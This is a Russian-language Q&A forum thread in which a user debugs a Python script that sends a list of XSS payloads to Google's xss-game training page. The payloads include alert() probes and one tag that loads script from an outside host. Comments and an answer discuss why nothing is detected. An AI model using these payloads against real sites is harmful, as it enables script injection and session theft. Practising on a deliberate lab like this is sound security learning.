# Почему он не видит тег <input>?

Tags: python-3.x, requests

Есть программа для выявления уязвимостей xss (только в ознакомительных целях )

```
import requests

form_input1 = 'post-content'
form_input2 = 'submit'
url = 'http://xss-game.appspot.com/level2/frame'

page = requests.get(url) # получаем содержимое сайта 
#soup = BeautifulSoup(page.text, "html.parser") # Указываем модулю bs4 то что мы сай будем парсить
scripts = ['<script>alert(1)</script>','<img src=''onerror=alert(/@_t0x1c/)>','<svg/onload=alert(/RUTHLESS/)>','<sCriPt>alert(1);</sCriPt>','<script>alert(1)</script>','<script src=http://ha.ckers.org/xss.js></script>','></title></style></scRipt><scRipt>alert(1231314)</scRipt>'] 
for xss in scripts: # Открываем цикл для внедрние скрипта в поля
    http = requests.post(url,data={form_input1:xss,form_input2:'submit'}) # Отправляем на сайт запрос с данными
    content = http.content.decode('utf-8') # Смотрим содержимое сайта
    if xss in content: # проверяем если какой нибудь скрипт js попал на сайт выводим следующие
        print('XSS [+] =>','[',xss,']')
    else:
        print('XSS [-] =>','[',xss,']')
```

В сайте специально была допущена `xss` уязвимость я указал 1 поле `<textarea>` и кнопку `<input>`, но программа выдает `[-]` хотя должна `[+]`

Где я допустил ошибку ?

Comment: А причем тут input в вопросе? Наверное, на том сайте есть защита от xss. Пробовали отправить текст с скриптом самостоятельно через браузер? Проверяли ответ от сайта? Возможно тот отклоняет POST-запросы с ошибкой. Кст, `http.content.decode('utf-8')` лучше заменить на `http.text`

Comment: @gil9red Дело в том то что тот сайт как раз и пропускает xss

Answer (score 0, accepted):

Я понял тот сайт который я тестировал на `xss` уязвимость он подвергает уязвимость но он пропускает через `js` а программа проверяет только `POST` запросы